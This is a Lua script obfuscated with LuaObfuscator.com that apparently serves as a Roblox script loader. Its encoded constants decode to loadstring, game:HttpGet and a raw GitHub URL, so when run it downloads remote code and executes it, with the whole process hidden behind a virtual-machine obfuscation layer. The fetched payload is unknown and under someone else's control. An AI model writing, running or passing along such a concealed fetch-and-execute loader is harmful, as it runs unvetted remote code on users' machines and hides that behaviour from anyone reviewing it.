--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.1.7) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=getfenv or function()return _ENV;end;local v9=setmetatable;local v10=pcall;local v11=select;local v12=unpack or table.unpack;local v13=tonumber;local function v14(v15,v16,...)local v17=0;local v18;local v19;local v20;local v21;local v22;local v23;local v24;local v25;local v26;local v27;local v28;local v29;while true do if (5==v17) then v26=v23;v27=nil;v27=function(...)return {...},v11("#",...);end;v17=6;end if (v17==1) then v20=nil;v20=function(v30,v31,v32)if v32 then local v62=(v30/((1340 -(1016 + 322))^(v31-(3 -2))))%(2^(((v32-(1583 -(957 + 342 + 283))) -(v31-1)) + (601 -(292 + 308))));return v62-(v62%(1881 -(1270 + 610)));else local v63=(2 + 0)^(v31-(1228 -(1121 + 106)));return (((v30%(v63 + v63))>=v63) and (2 -1)) or ((2748 -(669 + 436)) -(1277 + 279 + 87));end end;v21=nil;v17=2;end if (v17==0) then v18=1;v19=nil;v15=v4(v3(v15,5),"..",function(v33)if (v1(v33,2)==79) then local v64=0;while true do if (v64==0) then v19=v0(v3(v33,1,1));return "";end end else local v65=0;local v66;while true do if (v65==0) then v66=v2(v0(v33,16));if v19 then local v87=v5(v66,v19);v19=nil;return v87;else return v66;end break;end end end end);v17=1;end if (v17==3) then v23=nil;v23=function()local v38,v39,v40,v41=v1(v15,v18,v18 + (8 -5));v18=v18 + (6 -2);return (v41 * 16777216) + (v40 * (65765 -(155 + 74))) + (v39 * 256) + v38;end;v24=nil;v17=4;end if (v17==2) then v21=function()local v42=v1(v15,v18,v18);v18=v18 + 1;return v42;end;v22=nil;v22=function()local v43,v44=v1(v15,v18,v18 + 2);v18=v18 + (1532 -(810 + 720));return (v44 * (1991 -(1219 + 516))) + v43;end;v17=3;end if (v17==4) then v24=function()local v45=v23();local v46=v23();return (( -2 * v20(v46,112 -80)) + (4 -3)) * ((1254 -(617 + 635))^(v20(v46,1224 -(177 + 1026),78 -47) -(2627 -1604))) * ((((v20(v46,1 -0,6 + 14) * (2^(50 -((214 -(147 + 57)) + 8 + 0)))) + v45)/(2^(18 + 34))) + (562 -(310 + 251)));end;v25=nil;v25=function(v34)local v47;if  not v34 then v34=v23();if (v34==(1887 -(1389 + 498))) then return "";end end v47=v3(v15,v18,(v18 + v34) -(1454 -(502 + 951)));v18=v18 + v34;local v48={};for v60=2 -1, #v47 do v48[v60]=v2(v1(v3(v47,v60,v60)));end return v6(v48);end;v17=5;end if (v17==6) then v28=nil;v28=function()local v49=0 -0;local v50;local v51;local v52;local v53;local v54;local v55;local v56;while true do if (3==v49) then v56=nil;while true do local v72=0;while true do if (v72==(0 + 0)) then if (v50==(0 + 0)) then local v92=0;while true do if (v92~=(2 + 0)) then else v50=1;break;end if (v92==(1 + 0)) then v53={};v54={v51,v52,nil,v53};v92=2 + 0;end if (v92==0) then v51={};v52={};v92=1433 -(1231 + 201);end end end if (v50~=1) then else local v93=0;local v94;while true do if (v93~=(0 + 0)) then else v94=0 + 0;while true do if ((2 -1)==v94) then for v107=1 -0,v55 do local v108=0 -0;local v109;local v110;local v111;local v112;while true do if (v108==(1 + 0)) then v111=nil;v112=nil;v108=2;end if (v108==2) then while true do if ((0 -0)~=v109) then else local v141=0;while true do if (v141==(0 -0)) then v110=0;v111=nil;v141=808 -(66 + 741);end if (v141~=(1 + 0)) then else v109=1753 -(1459 + 293);break;end end end if ((2 -1)~=v109) then else v112=nil;while true do if (v110~=(974 -(940 + 33))) then else if (v111==1) then v112=v21()~=(0 + 0);elseif (v111==2) then v112=v24();elseif (v111==3) then v112=v25();end v56[v107]=v112;break;end if (v110~=(0 + 0)) then else v111=v21();v112=nil;v110=1;end end break;end end break;end if (v108==(539 -(392 + 147))) then v109=0;v110=nil;v108=1;end end end v54[601 -(64 + 534)]=v21();v94=6 -4;end if (v94~=(995 -(351 + 642))) then else v50=1 + 1;break;end if (v94~=0) then else v55=v23();v56={};v94=1 -0;end end break;end end end v72=1 + 0;end if (v72~=(1 + 0)) then else if (v50==2) then for v95=1,v23() do local v96=0 -0;local v97;local v98;while true do if (v96~=(1370 -(167 + 1202))) then else while true do if (v97~=0) then else v98=v21();if (v20(v98,2 -1,1 + 0)==0) then local v134=1621 -(677 + 944);local v135;local v136;local v137;local v138;local v139;local v140;while true do if (v134==0) then v135=0;v136=nil;v134=1;end if (v134~=1) then else v137=nil;v138=nil;v134=2;end if (v134~=(1528 -(458 + 1068))) then else v139=nil;v140=nil;v134=3;end if (v134~=3) then else while true do if (v135~=(1 + 1)) then else v140=nil;while true do if (1==v136) then v139=nil;v140=nil;v136=2;end if ((1078 -(161 + 917))~=v136) then else local v156=0;while true do if (v156~=0) then else local v161=0;while true do if (v161==1) then v156=1;break;end if (v161~=0) then else v137=0;v138=nil;v161=1 + 0;end end end if (v156==(1 + 0)) then v136=1 -0;break;end end end if ((4 -2)~=v136) then else while true do if (v137==1) then local v162=200 -(171 + 29);local v163;while true do if (v162==0) then v163=0;while true do if (v163~=0) then else v140={v22(),v22(),nil,nil};if (v138==0) then local v176=0;local v177;local v178;local v179;while true do if (v176==0) then v177=0;v178=nil;v176=553 -(395 + 157);end if (v176==1) then v179=nil;while true do if (v177==(442 -(372 + 70))) then local v186=0 -0;while true do if (v186==(986 -(891 + 94))) then v177=1;break;end if (v186==(0 -0)) then v178=0 -0;v179=nil;v186=1;end end end if (v177==(1 + 0)) then while true do if (0~=v178) then else v179=310 -(131 + 179);while true do if (v179~=0) then else v140[13 -10]=v22();v140[2 + 2]=v22();break;end end break;end end break;end end break;end end elseif (v138==(1 -0)) then v140[1496 -(997 + 496)]=v23();elseif (v138==2) then v140[3]=v23() -((7 -5)^16);elseif (v138~=3) then else local v187=0;while true do if (v187~=(0 + 0)) then else v140[3]=v23() -(2^16);v140[4]=v22();break;end end end v163=1;end if (v163==1) then v137=2;break;end end break;end end end if (v137==(382 -(279 + 103))) then local v164=0 + 0;local v165;while true do if (v164~=0) then else v165=0;while true do if ((0 -0)==v165) then local v174=0 -0;while true do if (v174~=(1 + 0)) then else v165=1;break;end if (0==v174) then v138=v20(v98,1512 -(224 + 1286),4 -1);v139=v20(v98,4,3 + 3);v174=1 + 0;end end end if (1==v165) then v137=1;break;end end break;end end end if (v137~=2) then else local v166=0;local v167;while true do if (v166~=(0 + 0)) then else v167=0 -0;while true do if (v167==1) then v137=3;break;end if (v167~=(0 + 0)) then else local v175=1643 -(485 + 1158);while true do if (v175~=0) then else if (v20(v139,1,1 + 0)~=(2 -1)) then else v140[2]=v56[v140[5 -3]];end if (v20(v139,2,2)~=(1 + 0)) then else v140[10 -7]=v56[v140[14 -11]];end v175=1;end if (v175~=(1 + 0)) then else v167=566 -(483 + 82);break;end end end end break;end end end if (v137~=3) then else if (v20(v139,3,675 -(304 + 368))==(4 -3)) then v140[2 + 2]=v56[v140[4]];end v51[v95]=v140;break;end end break;end end break;end if (v135~=(1 + 0)) then else local v149=0 + 0;while true do if (v149==1) then v135=1108 -(128 + 978);break;end if (0==v149) then v138=nil;v139=nil;v149=1 + 0;end end end if (v135~=0) then else v136=1114 -(311 + 803);v137=nil;v135=1 + 0;end end break;end end end break;end end break;end if (v96~=0) then else local v104=830 -(762 + 68);while true do if (v104~=0) then else v97=0 + 0;v98=nil;v104=1 + 0;end if (v104~=(3 -2)) then else v96=1594 -(1580 + 13);break;end end end end end for v99=1,v23() do v52[v99-(1400 -(108 + 1291))]=v28();end for v101=2 -1,v23() do v53[v101]=v23();end return v54;end break;end end end break;end if (v49==(1 + 1)) then v54=nil;v55=nil;v49=3;end if (v49~=(1 + 0)) then else v52=nil;v53=nil;v49=3 -1;end if (v49~=(0 -0)) then else v50=0 -0;v51=nil;v49=1 -0;end end end;v29=nil;v17=7;end if (v17==7) then v29=function(v35,v36,v37)local v57=v35[1];local v58=v35[2];local v59=v35[3];return function(...)local v67=1;local v68= -1;local v69={...};local v70=v11("#",...) -1;local function v71()local v73=v57;local v74=v58;local v75=v59;local v76=v27;local v77={};local v78={};local v79={};for v84=(599 + 210) -(589 + 220),v70 do if ((2980<=(3543 -(256 + 283))) and (v84>=v75)) then v77[v84-v75]=v69[v84 + 1 + 0];else v79[v84]=v69[v84 + (2 -1)];end end local v80=(v70-v75) + 1 + 0;local v81;local v82;while true do local v85=0 + 0;local v86;while true do if ((v85==((1545 -(310 + 1235)) + 0)) or ((3534 -2545)<=((122 -47) -25))) then v86=0 -0;while true do if ((599<(2934 -1532)) and (v86==(1803 -((1540 -856) + 1118)))) then if (((71 + 2690)>2757) and (v82<=(1325 -(1179 + 144)))) then if (((7442 -(3276 + 1722))<=(403 + 2710)) and (v82<=(0 + (0 -0)))) then v79[v81[324 -((508 -248) + 62)]]();elseif ((3552>(454 + 2778)) and (v82==(433 -(273 + 159)))) then v79[v81[1 + 1]]=v81[1341 -(739 + 599)];else local v115=(3048 -(688 + 573)) -(1388 + 399);local v116;local v117;local v118;while true do if ((v115==(852 -(338 + 513))) or (755>(7578 -3958))) then v118=nil;while true do if ((3160>=(10175 -7977)) and (v116==(250 -(49 + 201)))) then v117=v81[2 + 0];v118=v79[v81[929 -(362 + 564)]];v116=2 -1;end if ((v116==(3 -2)) or ((5025 -(1585 + 383))<(1678 -(1485 + 192)))) then v79[v117 + ((375 -(268 + 106)) -0)]=v118;v79[v117]=v118[v81[298 -(151 + 37 + 106)]];break;end end break;end if (((201 -49)<=(1738 -(128 + 1358))) and (v115==(1866 -(622 + 1244)))) then v116=1313 -(652 + 661);v117=nil;v115=1 + 0;end end end elseif (((4650 -2376)>=(3399 -(1151 + 643))) and (v82<=4)) then if ((v82>(1886 -(159 + 1724))) or ((2789 -1628)>4004)) then do return;end else local v119=0 + 0;local v120;local v121;local v122;local v123;local v124;local v125;while true do if ((632>=(576 -364)) and ((2 -1)==v119)) then v122=nil;v123=nil;v119=2 -(489 -(59 + 430));end if ((v119==3) or ((848 -520)>=(2445 + 1337))) then while true do if (((949 + 42)<((31374 -19128) -9619)) and (v120==(635 -(394 + 241)))) then local v147=0;while true do if ((((7103 -(1146 + 165)) -(21 + 188 + 810))==(13143 -8370)) and (v147==(1491 -(209 + 1282)))) then v121=0 + 0;v122=nil;v147=1 + 0;end if ((((748 -(460 + 19)) + (81 -27))<((5034 -(265 + 1207)) -((241 -(206 + 2)) + (1289 -(900 + 205))))) and (v147==(1 + 0))) then v120=1334 -(919 + 414);break;end end end if (((401 + 701)<=(4136 -(43 + 25 + 77))) and (v120==2)) then v125=nil;while true do if (((3338 -(738 + 149))>(248 -(8 + 28))) and (v121==(1 -0))) then local v151=333 -(328 + 5);while true do if (((5670 -3079)>126) and (v151==(1298 -(20 + (2773 -1495))))) then local v160=0 -0;while true do if (((5240 -(908 + 360))==(2516 + 1456)) and (v160==(1 + 0))) then v151=2 -(1582 -(465 + 1116));break;end if (((3841 -(308 + 567))<=4343) and (v160==(0 -0))) then v68=(v124 + v122) -1;v125=805 -(694 + (1008 -(430 + 467)));v160=1699 -(283 + 1415);end end end if (((504 -(428 + 75))==v151) or ((6449 -(1650 + 207))==(3348 -1894))) then v121=2;break;end end end if ((((959 -(113 + 844)) + 0)==v121) or ((8887 -5715)<=(1983 -(2033 -(1050 + 397))))) then for v157=v122,v68 do local v158=0 -0;local v159;while true do if ((587<=(7143 -2966)) and (v158==0)) then v159=0 -0;while true do if (((983 + 1895)==(1757 + (2518 -(549 + 848)))) and ((898 -(235 + 663))==v159)) then v125=v125 + (1 -0);v79[v157]=v123[v125];break;end end break;end end end break;end if (((4077 -(358 + 1422))<(8109 -3299)) and ((0 + 0)==v121)) then local v152=0 -0;local v153;while true do if ((v152==0) or ((4601 -2579)>(2068 + 2369))) then v153=0 -0;while true do if ((v153==(0 + 0)) or (3020==(12163 -(19268 -10266)))) then v122=v81[486 -(418 + 66)];v123,v124=v76(v79[v122](v12(v79,v122 + (687 -(188 + 498)),v81[3])));v153=1;end if ((v153==1) or (((4569 -(695 + 826)) + 1844)<=(2297 + 992))) then v121=1 -0;break;end end break;end end end end break;end if ((v120==(1 + 0)) or (((9813 -(526 + 707)) -4034)<=(5028 -2157))) then v123=nil;v124=nil;v120=6 -4;end end break;end if ((v119==0) or ((6188 -3112)==531)) then v120=0 -0;v121=nil;v119=437 -(211 + 81 + 144);end if ((1854>769) and (v119==(1 + (2 -1)))) then v124=nil;v125=nil;v119=1562 -(1088 + 471);end end end elseif ((v82==(12 -7)) or ((9001 -(7179 -(765 + 780)))<=(1047 + 726))) then v79[v81[1446 -((1300 -710) + 854)]]=v37[v81[3 + 0]];else local v128=0 -0;local v129;local v130;local v131;while true do if (((3820 -(420 + 80))>(4240 -1065)) and (v128==(0 + (0 -0)))) then v129=0 -0;v130=nil;v128=1 + 0;end if (((2360 -(342 + 240))<(5807 -(1435 + (1819 -(1181 + 75))))) and ((1801 -(1256 + 544))==v128)) then v131=nil;while true do if (((7088 -4232)>=(2312 -((727 -(348 + 327)) + 131))) and ((0 + 0)==v129)) then local v148=44 -(29 + 15);while true do if ((v148==(0 + 0)) or ((7638 -4262)<=(4531 -2075))) then v130=0 -0;v131=nil;v148=3 -(2 + 0);end if (((1660 + (1094 -781))>(2589 -(1064 + 75))) and (v148==1)) then v129=2 -1;break;end end end if ((v129==1) or ((1898 + (3379 -1677))==(3146 -(1418 + 242)))) then while true do if (((2758 -(129 + 212))<(1816 + 2649)) and (v130==(1926 -(1720 + 206)))) then v131=v81[2 + 0];v79[v131]=v79[v131](v12(v79,v131 + (103 -(72 + 30)),v68));break;end end break;end end break;end end end v67=v67 + 1;break;end if (((1231 + 45)<=(6725 -3288)) and (v86==(0 + 0))) then local v103=0;while true do if (((4144 -2458)>(1834 -(33 + 1176))) and (v103==1)) then v86=1 + 0;break;end if (((8404 -6056)<=(4026 -(1513 + 164))) and (v103==(0 + 0))) then local v105=0;while true do if ((v105==(0 + (233 -(78 + 155)))) or ((4829 -(179 + 20))<=(3645 -(149 + 349)))) then v81=v73[v67];v82=v81[1 -0];v105=1 + 0;end if ((1076==(2404 -(1270 + 58))) and (v105==1)) then v103=1;break;end end end end end end break;end end end end A,B=v27(v10(v71));if  not A[1] then local v83=v35[4][v67] or "?";error("Script error at ["   .. v83   .. "]:"   .. A[2]);else return v12(A,2,B);end end;end;return v29(v28(),{},v16)(...);end end end v14("LOL!043O00030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403543O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F726F626C6F786261642O31343531342F472O4F9O444O442F6D61696E2F436F6E747225323041726D7900083O0012053O00013O001205000100023O002002000100010003001201000300044O0003000100034O00065O00026O000100012O00043O00017O00083O00023O00023O00023O00023O00023O00023O00023O00033O00",v8(),...);end
